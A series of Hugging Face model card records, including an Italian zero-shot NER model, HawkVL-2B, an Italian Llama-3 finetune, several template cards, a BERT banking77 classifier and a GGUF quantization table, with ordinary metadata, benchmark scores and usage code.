cite: ```bibtex @misc{montebovi2025italiannerxxl, author = {Montebovi, Michele}, title = {Italian\_NER\_XXL\_v2: A Comprehensive Named Entity Recognition Model for Italian}, year = {2025}, publisher = {HuggingFace}, howpublished = {\url{https://huggingface.co/DeepMount00/Italian_NER_XXL_v2}} } ```
DeepMount00/universal_ner_ita
DeepMount00
2025-06-11T10:05:56Z
509
40
gliner
[ "gliner", "pytorch", "safetensors", "token-classification", "it", "dataset:DeepMount00/GLINER_ITA", "license:apache-2.0", "region:us" ]
token-classification
2024-03-10T10:13:13Z
--- language: - it pipeline_tag: token-classification library_name: gliner license: apache-2.0 datasets: - DeepMount00/GLINER_ITA --- --- **💡 Found this resource helpful?** Creating and maintaining open source AI models and datasets requires significant computational resources. If this work has been valuable to you, consider [supporting my research](https://buymeacoffee.com/michele.montebovi) to help me continue building tools that benefit the entire AI community. Every contribution directly funds more open source innovation! ☕ --- # Universal NER for Italian (Zero-Shot) It's important to note that **this model is universal and operates across all domains**. However, if you are seeking performance metrics close to a 90/99% F1 score for a specific domain, you are encouraged to reach out via email to Michele Montebovi at [email protected]. This direct contact allows for the possibility of customizing the model to achieve enhanced performance tailored to your unique entity recognition requirements in the Italian language. ## Try here: [https://huggingface.co/spaces/DeepMount00/universal_ner_ita](https://huggingface.co/spaces/DeepMount00/universal_ner_ita) ## Model Description This model is designed for Named Entity Recognition (NER) tasks, specifically tailored for the Italian language. It employs a zero-shot learning approach, enabling it to identify a wide range of entities without the need for specific training on those entities. This makes it incredibly versatile for various applications requiring entity extraction from Italian text. ## Model Performance - **Inference Time:** The model runs on CPUs, with an inference time of 0.01 seconds on a GPU. Performance on a CPU will vary depending on the specific hardware configuration. ## Try It Out You can test the model directly in your browser through the following Hugging Face Spaces link: [https://huggingface.co/spaces/DeepMount00/universal_ner_ita](https://huggingface.co/spaces/DeepMount00/universal_ner_ita). # Installation To use this model, you must download the GLiNER project: ``` !pip install gliner ``` # Usage ```python from gliner import GLiNER model = GLiNER.from_pretrained("DeepMount00/universal_ner_ita") text = """ Il comune di Castelrosso, con codice fiscale 80012345678, ha approvato il finanziamento di 15.000€ destinati alla ristrutturazione del parco giochi cittadino, affidando l'incarico alla società 'Verde Vivo Società Cooperativa', con sede legale in Corso della Libertà 45, Verona, da completarsi entro il 30/09/2024. """ labels = ["comune", "codice fiscale", "importo", "società", "indirizzo", "data di completamento"] entities = model.predict_entities(text, labels) max_length = max(len(entity["text"]) for entity in entities) for entity in entities: padded_text = entity["text"].ljust(max_length) print(f"{padded_text} => {entity['label']}") ```
xjtupanda/HawkVL-2B
xjtupanda
2025-06-11T10:05:26Z
0
0
transformers
[ "transformers", "safetensors", "hawk_vl", "text-generation", "image-text-to-text", "conversational", "en", "zh", "dataset:lmms-lab/LLaVA-OneVision-Data", "base_model:Qwen/Qwen2.5-1.5B-Instruct", "base_model:finetune:Qwen/Qwen2.5-1.5B-Instruct", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
image-text-to-text
2025-06-11T08:57:13Z
--- license: apache-2.0 datasets: - lmms-lab/LLaVA-OneVision-Data language: - en - zh base_model: - Qwen/Qwen2.5-1.5B-Instruct pipeline_tag: image-text-to-text library_name: transformers --- # Introduction We are excited to introduce **HawkVL**, a series of multimodal large language models (MLLMs) featuring light-weight and efficiency. **Architecture**: - ViT: Qwen-ViT - Projector: 2-layer MLP with pixel unshuffle - LLM: Qwen2.5-1.5B ### Evaluation We evaluate on eight benchmarks specified in the [OpenCompass](https://rank.opencompass.org.cn/leaderboard-multimodal) leaderboard using [VLMEvalKit](https://github.com/open-compass/VLMEvalKit), including: `MMBench_TEST_EN/CN_V11, MMStar, MMMU_DEV_VAL, MathVista_MINI, HallusionBench, AI2D_TEST, OCRBench, MMVet` The results are as follows: | Benchmark | HawkVL-2B | |------------------|-----------| | MMBench-TEST-avg | 64.9 | | MMStar | 48.2 | | MMMU-VAL | 43.9 | | MathVista_MINI | 44.1 | | HallusionBench | 58.5 | | AI2D_TEST | 67.4 | | OCRBench | 74.9 | | MMVet | 36.6 | | Avg | 54.8 | ## License Agreement All of our open-source models are licensed under the Apache-2.0 license.
DeepMount00/Llama-3-8b-Ita
DeepMount00
2025-06-11T10:04:06Z
22,491
30
transformers
[ "transformers", "safetensors", "llama", "text-generation", "conversational", "it", "en", "dataset:DeepMount00/llm_ita_ultra", "base_model:meta-llama/Meta-Llama-3-8B", "base_model:finetune:meta-llama/Meta-Llama-3-8B", "license:llama3", "model-index", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2024-05-01T12:43:40Z
--- language: - it - en license: llama3 library_name: transformers base_model: meta-llama/Meta-Llama-3-8B datasets: - DeepMount00/llm_ita_ultra model-index: - name: Llama-3-8b-Ita results: - task: type: text-generation name: Text Generation dataset: name: IFEval (0-Shot) type: HuggingFaceH4/ifeval args: num_few_shot: 0 metrics: - type: inst_level_strict_acc and prompt_level_strict_acc value: 75.3 name: strict accuracy source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: BBH (3-Shot) type: BBH args: num_few_shot: 3 metrics: - type: acc_norm value: 28.08 name: normalized accuracy source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: MATH Lvl 5 (4-Shot) type: hendrycks/competition_math args: num_few_shot: 4 metrics: - type: exact_match value: 5.36 name: exact match source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: GPQA (0-shot) type: Idavidrein/gpqa args: num_few_shot: 0 metrics: - type: acc_norm value: 7.38 name: acc_norm source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: MuSR (0-shot) type: TAUR-Lab/MuSR args: num_few_shot: 0 metrics: - type: acc_norm value: 11.68 name: acc_norm source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: MMLU-PRO (5-shot) type: TIGER-Lab/MMLU-Pro config: main split: test args: num_few_shot: 5 metrics: - type: acc value: 31.69 name: accuracy source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard --- --- **💡 Found this resource helpful?** Creating and maintaining open source AI models and datasets requires significant computational resources. If this work has been valuable to you, consider [supporting my research](https://buymeacoffee.com/michele.montebovi) to help me continue building tools that benefit the entire AI community. Every contribution directly funds more open source innovation! ☕ --- ## Model Architecture - **Base Model:** [Meta-Llama-3-8B](https://huggingface.co/meta-llama/Meta-Llama-3-8B) - **Specialization:** Italian Language ## Evaluation For a detailed comparison of model performance, check out the [Leaderboard for Italian Language Models](https://huggingface.co/spaces/FinancialSupport/open_ita_llm_leaderboard). Here's a breakdown of the performance metrics: | Metric | hellaswag_it acc_norm | arc_it acc_norm | m_mmlu_it 5-shot acc | Average | |:----------------------------|:----------------------|:----------------|:---------------------|:--------| | **Accuracy Normalized** | 0.6518 | 0.5441 | 0.5729 | 0.5896 | --- ## How to Use ```python from transformers import AutoModelForCausalLM, AutoTokenizer import torch device = torch.device("cuda" if torch.cuda.is_available() else "cpu") MODEL_NAME = "DeepMount00/Llama-3-8b-Ita" model = AutoModelForCausalLM.from_pretrained(MODEL_NAME, torch_dtype=torch.bfloat16).eval() model.to(device) tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME) def generate_answer(prompt): messages = [ {"role": "user", "content": prompt}, ] model_inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(device) generated_ids = model.generate(model_inputs, max_new_tokens=200, do_sample=True, temperature=0.001) decoded = tokenizer.batch_decode(generated_ids, skip_special_tokens=True) return decoded[0] prompt = "Come si apre un file json in python?" answer = generate_answer(prompt) print(answer) ``` --- ## Developer [Michele Montebovi] # [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard) Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_DeepMount00__Llama-3-8b-Ita) | Metric |Value| |-------------------|----:| |Avg. |26.58| |IFEval (0-Shot) |75.30| |BBH (3-Shot) |28.08| |MATH Lvl 5 (4-Shot)| 5.36| |GPQA (0-shot) | 7.38| |MuSR (0-shot) |11.68| |MMLU-PRO (5-shot) |31.69|
TarunKM/Nexteer-lora-adapter-45E_third_model
TarunKM
2025-06-11T10:04:05Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:03:59Z
--- base_model: unsloth/llama-3.1-8b-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** TarunKM - **License:** apache-2.0 - **Finetuned from model :** unsloth/llama-3.1-8b-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
gradientrouting-spar/mc8_badmed_naive_atc-0.0_data_seed-42_model_seed-42_seed_1
gradientrouting-spar
2025-06-11T10:03:28Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:03:08Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
gradientrouting-spar/mc8_badmed_naive_atc-0.0_data_seed-42_model_seed-42_seed_1_epoch_1
gradientrouting-spar
2025-06-11T10:03:07Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:02:57Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
ibrahimbukhariLingua/qwen2.5-7b-en-wikipedia-finance-500-v4
ibrahimbukhariLingua
2025-06-11T10:02:44Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:Qwen/Qwen2.5-7B-Instruct", "base_model:finetune:Qwen/Qwen2.5-7B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:02:26Z
--- base_model: Qwen/Qwen2.5-7B-Instruct library_name: transformers model_name: qwen2.5-7b-en-wikipedia-finance-500-v4 tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for qwen2.5-7b-en-wikipedia-finance-500-v4 This model is a fine-tuned version of [Qwen/Qwen2.5-7B-Instruct](https://huggingface.co/Qwen/Qwen2.5-7B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="ibrahimbukhariLingua/qwen2.5-7b-en-wikipedia-finance-500-v4", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
Kirie/bert-base-banking77-pt2
Kirie
2025-06-11T09:59:15Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "bert", "text-classification", "generated_from_trainer", "base_model:google-bert/bert-base-uncased", "base_model:finetune:google-bert/bert-base-uncased", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-06-11T09:29:54Z
--- library_name: transformers license: apache-2.0 base_model: bert-base-uncased tags: - generated_from_trainer metrics: - f1 model-index: - name: bert-base-banking77-pt2 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # bert-base-banking77-pt2 This model is a fine-tuned version of [bert-base-uncased](https://huggingface.co/bert-base-uncased) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 1.4827 - F1: 0.7889 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 32 - eval_batch_size: 16 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 3 ### Training results | Training Loss | Epoch | Step | Validation Loss | F1 | |:-------------:|:-----:|:----:|:---------------:|:------:| | 3.9488 | 1.0 | 313 | 2.6225 | 0.5997 | | 2.0418 | 2.0 | 626 | 1.7204 | 0.7470 | | 1.6508 | 3.0 | 939 | 1.4827 | 0.7889 | ### Framework versions - Transformers 4.52.4 - Pytorch 2.7.1+cu128 - Datasets 3.6.0 - Tokenizers 0.21.1
RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf
RichardErkhov
2025-06-11T09:58:46Z
0
0
null
[ "gguf", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T08:35:12Z
Quantization made by Richard Erkhov. [Github](https://github.com/RichardErkhov) [Discord](https://discord.gg/pvy7H8DZMG) [Request more models](https://github.com/RichardErkhov/quant_request) potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix - GGUF - Model creator: https://huggingface.co/suehyunpark/ - Original model: https://huggingface.co/suehyunpark/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix/ | Name | Quant method | Size | | ---- | ---- | ---- | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q2_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q2_K.gguf) | Q2_K | 2.96GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_XS.gguf) | IQ3_XS | 3.28GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_S.gguf) | IQ3_S | 3.43GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_S.gguf) | Q3_K_S | 3.41GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_M.gguf) | IQ3_M | 3.52GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K.gguf) | Q3_K | 3.74GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_M.gguf) | Q3_K_M | 3.74GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_L.gguf) | Q3_K_L | 4.03GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ4_XS.gguf) | IQ4_XS | 4.18GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_0.gguf) | Q4_0 | 4.34GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ4_NL.gguf) | IQ4_NL | 4.38GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_S.gguf) | Q4_K_S | 4.37GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K.gguf) | Q4_K | 4.58GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_M.gguf) | Q4_K_M | 4.58GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_1.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_1.gguf) | Q4_1 | 4.78GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_0.gguf) | Q5_0 | 5.21GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K_S.gguf) | Q5_K_S | 5.21GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K.gguf) | Q5_K | 5.34GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K_M.gguf) | Q5_K_M | 5.34GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_1.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_1.gguf) | Q5_1 | 5.65GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q6_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q6_K.gguf) | Q6_K | 6.14GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q8_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q8_0.gguf) | Q8_0 | 7.95GB | Original model description: --- base_model: barc0/Llama-3.1-ARC-Potpourri-Induction-8B datasets: - suehyunpark/induction_arc_inputs_train_bc_trajectories_max1-per-task_tool_token library_name: transformers 